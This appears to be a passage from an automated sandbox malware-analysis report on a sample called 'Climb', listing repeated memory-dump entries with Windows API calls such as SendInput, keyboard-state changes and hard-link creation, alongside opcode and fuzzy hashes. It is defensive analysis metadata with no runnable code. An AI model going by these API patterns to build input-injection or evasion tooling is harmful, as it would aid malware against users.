                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                                          • Opcode ID: 8e4450d3798a7379711a03a0f6f034f9499164167e45dc126e248e57cb0f9f3d
                                                                                                                                                                          • Instruction ID: 493610a0f96d7acc7f1b170a55fc52a0e08c1e7e334af4497ebf6827ade87f01
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e4450d3798a7379711a03a0f6f034f9499164167e45dc126e248e57cb0f9f3d
                                                                                                                                                                          • Instruction Fuzzy Hash: 31512E74A00209EFCF25DFA4D8809AE7BB6FF55328F108559F955AB2A0D730AE81CB51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 751a40015c95d10ae6faf7d3de5a6ec5cae8fc6982ebc6d25d9fa3a6ff2ab8a0
                                                                                                                                                                          • Instruction ID: c219a2ea26cecd062fe497d65bb986b3f68477dc13201db90200d76b05660089
                                                                                                                                                                          • Opcode Fuzzy Hash: 751a40015c95d10ae6faf7d3de5a6ec5cae8fc6982ebc6d25d9fa3a6ff2ab8a0
                                                                                                                                                                          • Instruction Fuzzy Hash: BB410471A00744AFE724AF79CD41BABBBEDEB88710F10853AF151EB792DB7199018790
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001261C8
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 001261EE
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00126213
                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0012623F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3321077145-0
                                                                                                                                                                          • Opcode ID: 33826aaef120ef5be91b9a832f63335568df654b344c42d315a426107158bb64
                                                                                                                                                                          • Instruction ID: 1b2e452942878603b54697264a40a7f24b63314998dc49dbac77b484ce496020
                                                                                                                                                                          • Opcode Fuzzy Hash: 33826aaef120ef5be91b9a832f63335568df654b344c42d315a426107158bb64
                                                                                                                                                                          • Instruction Fuzzy Hash: 91414C39600610DFCB15EF14D545A9EBBE6EF89710B19C488E85AAB3A2CB30FD41CF91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0011B473
                                                                                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0011B48F
                                                                                                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0011B4FD
                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0011B54F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                          • Opcode ID: c597bac814f0964a031a577a1670e4d98357f85ff5da11d50852b5e572b17d9c
                                                                                                                                                                          • Instruction ID: 328621691ea0f560db34ca852192f3b44c7008ffb2add8f6018c02ba16fe5405
                                                                                                                                                                          • Opcode Fuzzy Hash: c597bac814f0964a031a577a1670e4d98357f85ff5da11d50852b5e572b17d9c
                                                                                                                                                                          • Instruction Fuzzy Hash: B8314B70A482186EFF3CCB28D8857FA7BB6AF59314F04823AF496965D2C37489C58751
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0011B5B8
                                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0011B5D4
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0011B63B
                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0011B68D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                          • Opcode ID: bc6224bd4954550f44c8912bd5a2b4206fd9479714660558c9ea7c0b5fbc9bbe
                                                                                                                                                                          • Instruction ID: cb24784f02723e8af65778e66fc89f8c211908b94f8c249f19a9eeb842ae28ce
                                                                                                                                                                          • Opcode Fuzzy Hash: bc6224bd4954550f44c8912bd5a2b4206fd9479714660558c9ea7c0b5fbc9bbe
                                                                                                                                                                          • Instruction Fuzzy Hash: DD313C30A486086EFF3C8B648C857FE7BB6AFA5310F04423AE485961E1D7748AC5CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 001480D4
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0014814A
                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 0014815A
                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 001481C6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                          • Opcode ID: 75b4a4d4884386b6cc36c31fdc563eb4c8ab6230ccb74179d8ea2251701bb2a2
                                                                                                                                                                          • Instruction ID: f56d4e0fe3f70ab33ce0b57bff3c6d1cbe6ad9c30dd11ca99b720ce80c83156b
                                                                                                                                                                          • Opcode Fuzzy Hash: 75b4a4d4884386b6cc36c31fdc563eb4c8ab6230ccb74179d8ea2251701bb2a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 3541BE34A00215DFCB16CF58C884AADBBF5FF49B14F1441AAE9549B2B1CB30E982CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00142187
                                                                                                                                                                            • Part of subcall function 00114393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001143AD
                                                                                                                                                                            • Part of subcall function 00114393: GetCurrentThreadId.KERNEL32 ref: 001143B4
                                                                                                                                                                            • Part of subcall function 00114393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00112F00), ref: 001143BB
                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 0014219B
                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 001421E8
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001421EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                                          • Opcode ID: 864416a035f0b5153344fffc66fc6d4b1972bbc6d2f65d884850b1de6df38cb2
                                                                                                                                                                          • Instruction ID: 273ef563af13645659ac51b7071c92832746bc4a8ba67d7634b0f33c6f474908
                                                                                                                                                                          • Opcode Fuzzy Hash: 864416a035f0b5153344fffc66fc6d4b1972bbc6d2f65d884850b1de6df38cb2
                                                                                                                                                                          • Instruction Fuzzy Hash: 02313275D00109AFDB04DFA5C881DEEB7FCEF58304B54846AE415E7212EB719E45CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011E8E2
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011E8F9
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011E924
                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0011E92F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3763101759-0
                                                                                                                                                                          • Opcode ID: e84153980d9c54f37239fd15345ec01ecce8f8720bcb7c18692f924c0d677e74
                                                                                                                                                                          • Instruction ID: c71e80bd5ec6c63100c092b801ac308e44fc8f0ff7c4ac5761b47a90f9c6e203
                                                                                                                                                                          • Opcode Fuzzy Hash: e84153980d9c54f37239fd15345ec01ecce8f8720bcb7c18692f924c0d677e74
                                                                                                                                                                          • Instruction Fuzzy Hash: D321A175D00318AFCB15AFA8D982BEEB7F8EF45750F144066E804AB342D7709E818BB1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00149A5D
                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00149A72
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00149ABA
                                                                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00149AF0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2864067406-0
                                                                                                                                                                          • Opcode ID: 570bcb2af3763a3b80973027afdd509a7765e0723c3cf0675f0c0edee0339b40
                                                                                                                                                                          • Instruction ID: c0ce4eec0ff57c30a8aa40531616ff51aa8d33fe79d635ab4f128da495e85546
                                                                                                                                                                          • Opcode Fuzzy Hash: 570bcb2af3763a3b80973027afdd509a7765e0723c3cf0675f0c0edee0339b40
                                                                                                                                                                          • Instruction Fuzzy Hash: 2721BC34600018AFCF268F94D888EEF7BBAFB0A320F604265F9058B1B1D7309991DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,0014DC30), ref: 0011DBA6
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0011DBB5
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0011DBC4
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0014DC30), ref: 0011DC21
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2267087916-0
                                                                                                                                                                          • Opcode ID: a08c51347ef2e7cabeea4ddc079afb05d8b7dd02a3f128ac4376d30891df7f30
                                                                                                                                                                          • Instruction ID: 991c94711391528acc6385374293574cbf2a12274e284e09d3e084bc2532d754
                                                                                                                                                                          • Opcode Fuzzy Hash: a08c51347ef2e7cabeea4ddc079afb05d8b7dd02a3f128ac4376d30891df7f30
                                                                                                                                                                          • Instruction Fuzzy Hash: 2821B7706087019F8704DF24E8809DB77E8EF56364F100A2DF499C32A2DB71D986CB82
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001432A6
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001432C0
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001432CE
                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001432DC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                                          • Opcode ID: f005f838a957ccf9771774a6f6284bb94524ddae18ea5245e5ad9948f687c351
                                                                                                                                                                          • Instruction ID: 1e9115fbe51c286d4c494f2b03deb4890c631ae1da30b798e10673cb77233c0b
                                                                                                                                                                          • Opcode Fuzzy Hash: f005f838a957ccf9771774a6f6284bb94524ddae18ea5245e5ad9948f687c351
                                                                                                                                                                          • Instruction Fuzzy Hash: DD21D331304111AFE7149B24C855FAABB95EF82324F248258F8368B6E2C7B1ED81CBD0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 001196E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00118271,?,000000FF,?,001190BB,00000000,?,0000001C,?,?), ref: 001196F3
                                                                                                                                                                            • Part of subcall function 001196E4: lstrcpyW.KERNEL32(00000000,?,?,00118271,?,000000FF,?,001190BB,00000000,?,0000001C,?,?,00000000), ref: 00119719
                                                                                                                                                                            • Part of subcall function 001196E4: lstrcmpiW.KERNEL32(00000000,?,00118271,?,000000FF,?,001190BB,00000000,?,0000001C,?,?), ref: 0011974A
                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001190BB,00000000,?,0000001C,?,?,00000000), ref: 0011828A
                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,001190BB,00000000,?,0000001C,?,?,00000000), ref: 001182B0
                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,001190BB,00000000,?,0000001C,?,?,00000000), ref: 001182EB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                          • String ID: cdecl
                                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                                          • Opcode ID: e8514a69bbca6773e638dff59ac8bb050447b25177ad17917a47fecd8fb6597a
                                                                                                                                                                          • Instruction ID: 27009af96768a6446036a8ad3afdd9b32ce9fb316270820bd484e16b1977b567
                                                                                                                                                                          • Opcode Fuzzy Hash: e8514a69bbca6773e638dff59ac8bb050447b25177ad17917a47fecd8fb6597a
                                                                                                                                                                          • Instruction Fuzzy Hash: 4511E93A200351ABCB199F34D845EBA77A9FF45B50B50803AF946C72A0EF31D891D761
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 0014615A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014616C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00146177
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001462B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 455545452-0
                                                                                                                                                                          • Opcode ID: 524966f8611ab2709d6a99a7a453db45b54ae5007a0881ca5a9e757518c57a87
                                                                                                                                                                          • Instruction ID: 4101ee178198675e0c338d2c7ae114e6e84483978bb1310c234ad3cc26c3c87a
                                                                                                                                                                          • Opcode Fuzzy Hash: 524966f8611ab2709d6a99a7a453db45b54ae5007a0881ca5a9e757518c57a87
                                                                                                                                                                          • Instruction Fuzzy Hash: 1511D375500208A7DF10DF649C84EEF77BCEB52758B10402BFA15D61A3E770C944CB62
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5e7b18f0d3a0fcedf631b5f849dd0936bb785acc8fa0023f58467295b6cc0b8c
                                                                                                                                                                          • Instruction ID: bfc6f39d1375f69112267f4cd1def6cadf4c9e6ebf766bac2a434c0de580158d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7b18f0d3a0fcedf631b5f849dd0936bb785acc8fa0023f58467295b6cc0b8c
                                                                                                                                                                          • Instruction Fuzzy Hash: C601D6B220929A7EFA71267A7CC0F6B678DDF817B8B354725F921B11D3DE608C808160
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00112394
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001123A6
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001123BC
                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001123D7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
